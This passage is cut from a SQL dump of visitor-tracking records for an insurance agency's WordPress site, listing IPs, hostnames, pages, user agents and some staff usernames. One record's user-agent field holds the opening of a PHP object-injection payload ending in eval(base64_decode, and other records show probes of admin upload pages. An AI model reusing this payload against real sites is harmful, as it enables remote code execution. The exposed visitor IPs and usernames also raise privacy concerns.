Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','yitzchok','','0','51',0),(1841,'0b_737a36754cadc960e20b4e811b0432ab','1457405377','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','yitzchok','','0','51',0),(1844,'0b_737a36754cadc960e20b4e811b0432ab','1457405377','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','yitzchok','','0','51',0),(1847,'0b_737a36754cadc960e20b4e811b0432ab','1457405378','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','yitzchok','','0','51',0),(1849,'0b_737a36754cadc960e20b4e811b0432ab','1457405378','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','yitzchok','','0','0',0),(1850,'0b_737a36754cadc960e20b4e811b0432ab','1457405386','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','yitzchok','','0','51',0),(1853,'0b_aee2bc78c4dd922205b64948914921b7','1457405393','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1855,'0b_737a36754cadc960e20b4e811b0432ab','1457405399','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','yitzchok','','0','51',0),(1858,'0b_d9138124f2e1bbdc075a37e2f2a19c10','1457406776','58.22.70.103','58.22.70.103','/','Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0','http://www.empireins.com/','',0,'WinXP','Firefox 3','us','','','','','','','3','0',0),(1859,'0b_d9138124f2e1bbdc075a37e2f2a19c10','1457406782','58.22.70.103','58.22.70.103','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0','http://www.empireins.com/wp-admin/admin-ajax.php','',0,'WinXP','Firefox 3','us','','','','','','','3','0',0),(1862,'0b_290add326f156b8adf419e77a71a7370','1457406889','58.22.70.103','58.22.70.103','/wp-links.php.suspected_','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.googlebot.com/bot.html','',0,'','','','','','Spoofer bot','','','','0','0',0),(1865,'0b_7a73f1b3352b9d5dd89ee548e9268a51','1457413360','79.250.17.79','p4ffa114f.dip0.t-ipconnect.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1867,'0b_7a73f1b3352b9d5dd89ee548e9268a51','1457413362','79.250.17.79','p4ffa114f.dip0.t-ipconnect.de','/SSO/235_38.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1868,'0b_7a73f1b3352b9d5dd89ee548e9268a51','1457413364','79.250.17.79','p4ffa114f.dip0.t-ipconnect.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1871,'0b_7a73f1b3352b9d5dd89ee548e9268a51','1457413370','79.250.17.79','p4ffa114f.dip0.t-ipconnect.de','/SSO/235_38.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1874,'0b_7a73f1b3352b9d5dd89ee548e9268a51','1457413374','79.250.17.79','p4ffa114f.dip0.t-ipconnect.de','/calc.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1877,'0b_7a73f1b3352b9d5dd89ee548e9268a51','1457413380','79.250.17.79','p4ffa114f.dip0.t-ipconnect.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1880,'0b_82c28843359118b66e17c1cbd82edbce','1457413788','51.254.143.241','241.ip-51-254-143.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1882,'0b_82c28843359118b66e17c1cbd82edbce','1457413791','51.254.143.241','241.ip-51-254-143.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1885,'0b_87d999e47298437c979f614b4daa8ca0','1457416005','40.77.167.45','msnbot-40-77-167-45.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1886,'0b_5404f41503856a00012df068569a7aeb','1457416086','180.76.15.6','baiduspider-180-76-15-6.crawl.baidu.com','/forms/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1889,'0b_afe20555f1552ae36982c103d2878a4d','1457417293','66.249.83.249,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','','','','','','','','0','0',0),(1892,'0b_90cf143ec1a951b916b92533a2cb3572','1457417293','66.249.83.209,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','','','','','','','','0','0',0),(1894,'0b_c550fbffd5cae76461a816fc6e19d24f','1457417960','88.198.230.79','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1895,'0b_c550fbffd5cae76461a816fc6e19d24f','1457417962','88.198.230.79','majestic12.co.uk','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1897,'0b_c550fbffd5cae76461a816fc6e19d24f','1457417964','88.198.230.79','majestic12.co.uk','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1898,'0b_450ba58b97df65abbc9ac11fe1288051','1457418096','180.76.15.146','baiduspider-180-76-15-146.crawl.baidu.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1900,'0b_0b12f0220116810e589b2c857454941c','1457419495','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(1903,'0b_0b12f0220116810e589b2c857454941c','1457419497','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(1904,'0b_0b12f0220116810e589b2c857454941c','1457419499','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(1906,'0b_0b12f0220116810e589b2c857454941c','1457419501','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(1907,'0b_11af4d8866315090a2d785fe25da19cb','1457421458','69.30.198.202','69.30.198.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(1909,'0b_11af4d8866315090a2d785fe25da19cb','1457421469','69.30.198.202','69.30.198.202','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(1910,'0b_a6f2fb7db9002988ce3ef5a02a63efc2','1457423585','180.76.15.33','baiduspider-180-76-15-33.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1913,'0b_c1fed57c1a216db0ffea9d01853c1754','1457423706','69.30.210.242','69.30.210.242','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(1916,'0b_c1fed57c1a216db0ffea9d01853c1754','1457423717','69.30.210.242','69.30.210.242','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(1918,'0b_4f6ff4958e872d1d385f1565f3e71ea6','1457427764','40.77.167.45','msnbot-40-77-167-45.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1919,'0b_33f0036ed838a284c1670983fa1e2386','1457429280','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1922,'0b_a158c2bb71a95e9e2f73ddd5e99376d2','1457431655','66.249.75.109','crawl-66-249-75-109.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1924,'0b_146251d519ec0f7c740fc35e535f2a4b','1457432791','52.73.200.208','ec2-52-73-200-208.compute-1.amazonaws.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(1927,'0b_a5c25bfb626c7f8f0f2e59a41df2370a','1457432939','54.165.110.58','ec2-54-165-110-58.compute-1.amazonaws.com','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)','','',0,'WinNT 4.0','IE 5','','','','','','','','0','0',0),(1928,'0b_a5c25bfb626c7f8f0f2e59a41df2370a','1457432942','54.165.110.58','ec2-54-165-110-58.compute-1.amazonaws.com','/contact/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)','','',0,'WinNT 4.0','IE 5','','','','','','','','0','0',0),(1930,'0b_a5c25bfb626c7f8f0f2e59a41df2370a','1457432943','54.165.110.58','ec2-54-165-110-58.compute-1.amazonaws.com','/about-us/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)','','',0,'WinNT 4.0','IE 5','','','','','','','','0','0',0),(1931,'0b_32597774f90bf806de7a349a762d14f0','1457437364','93.153.41.222','93-153-41-222.tmcz.cz','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:1182:\\\"eval(base64_decode','','',0,'','','cz','','','Feed Reader','feed reader','','','0','0',0),(1934,'0b_5e1d013e9e6e49b675022084c50d0557','1457439307','31.148.219.169','hunter.clientshostname.com','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(1937,'0b_5e1d013e9e6e49b675022084c50d0557','1457439309','31.148.219.169','hunter.clientshostname.com','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(1939,'0b_c43a8b63215aafc145c86f5bb532f8b8','1457439477','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1940,'0b_a56173d0c4e65d0f550211a3a1310684','1457443924','5.9.63.149','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1942,'0b_a56173d0c4e65d0f550211a3a1310684','1457443928','5.9.63.149','majestic12.co.uk','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1943,'0b_a56173d0c4e65d0f550211a3a1310684','1457443930','5.9.63.149','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1945,'0b_a56173d0c4e65d0f550211a3a1310684','1457443932','5.9.63.149','majestic12.co.uk','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1946,'0b_a56173d0c4e65d0f550211a3a1310684','1457443935','5.9.63.149','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1948,'0b_a56173d0c4e65d0f550211a3a1310684','1457443938','5.9.63.149','majestic12.co.uk','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1951,'0b_a56173d0c4e65d0f550211a3a1310684','1457443940','5.9.63.149','majestic12.co.uk','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(1952,'0b_a0bad965a81f84781a788e3439cb9077','1457444204','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1955,'0b_8f627cd9b6f7c2521f1c84a5ab05f8af','1457444927','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1958,'0b_8f627cd9b6f7c2521f1c84a5ab05f8af','1457444929','66.249.73.178','crawl-66-249-73-178.googlebot.com','/under.html','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(1961,'0b_9d3d0baa43fd105e562de3b3937375d4','1457446555','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(1963,'0b_97d721d31af6a4307cd5819e050e5dde','1457446555','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(1966,'0b_97d721d31af6a4307cd5819e050e5dde','1457446557','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(1967,'0b_9d3d0baa43fd105e562de3b3937375d4','1457446557','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(1969,'0b_6fc6dfee10e0abbacc46bdb7f08afe57','1457446693','209.159.138.19','tor-amici-exit.tritn.com','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(1970,'0b_766d7904c0b705251e3e7a4b419b9491','1457447666','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(1973,'0b_4084a82df1d01f3f54c17097f9d35d14','1457449541','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1975,'0b_e2f811366ca0041199c4f76c24295e62','1457450214','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1976,'0b_9d3d0baa43fd105e562de3b3937375d4','1457450973','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(1978,'0b_9d3d0baa43fd105e562de3b3937375d4','1457450975','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(1981,'0b_9d3d0baa43fd105e562de3b3937375d4','1457450983','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(1982,'0b_43475022344e284be02df13b46836947','1457451627','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1984,'0b_43475022344e284be02df13b46836947','1457451627','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1987,'0b_43475022344e284be02df13b46836947','1457451629','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1990,'0b_43475022344e284be02df13b46836947','1457451631','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1993,'0b_43475022344e284be02df13b46836947','1457451641','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(1996,'0b_b4b08fa3fc0246599e01383c97d5bc91','1457453151','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1999,'0b_b4b08fa3fc0246599e01383c97d5bc91','1457453155','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2000,'0b_b4b08fa3fc0246599e01383c97d5bc91','1457453157','69.175.22.218','newscan02.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2003,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457453349','69.116.56.224','ool-457438e0.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(2006,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457453350','69.116.56.224','ool-457438e0.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(2009,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457453362','69.116.56.224','ool-457438e0.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(2012,'0b_9344b3d6ffab2f6d42f53d37445f1400','1457453740','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 48','us','1024 x 768','Google','','','','','0','0',0),(2014,'0b_9344b3d6ffab2f6d42f53d37445f1400','1457453741','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 48','us','1024 x 768','Google','','','','','0','0',0),(2015,'0b_9344b3d6ffab2f6d42f53d37445f1400','1457453762','209.64.152.62','209.64.152.62','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1024 x 768','','','','','','0','0',0),(2018,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457453773','69.116.56.224','ool-457438e0.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','51',0),(2020,'0b_9344b3d6ffab2f6d42f53d37445f1400','1457453801','209.64.152.62','209.64.152.62','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1024 x 768','','','','','','0','0',0),(2023,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457454122','69.116.56.224','ool-457438e0.dyn.optonline.net','/?page_id=171','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','3','171',0),(2024,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457454123','69.116.56.224','ool-457438e0.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','3','51',0),(2026,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457454125','69.116.56.224','ool-457438e0.dyn.optonline.net','/?page_id=171','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','3','0',0),(2027,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457454126','69.116.56.224','ool-457438e0.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','3','0',0),(2029,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454148','69.116.56.224','ool-457438e0.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','0',0),(2030,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454155','69.116.56.224','ool-457438e0.dyn.optonline.net','/members/?a=pwdchange','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','0',0),(2033,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457454171','69.116.56.224','ool-457438e0.dyn.optonline.net','/members/?a=pwdchange','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','jsimcha','','0','51',0),(2035,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454184','69.116.56.224','ool-457438e0.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/?a=pwdchange','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(2038,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454219','69.116.56.224','ool-457438e0.dyn.optonline.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(2039,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457454223','69.116.56.224','ool-457438e0.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/?a=pwdchange','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','51',0),(2041,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454230','69.116.56.224','ool-457438e0.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 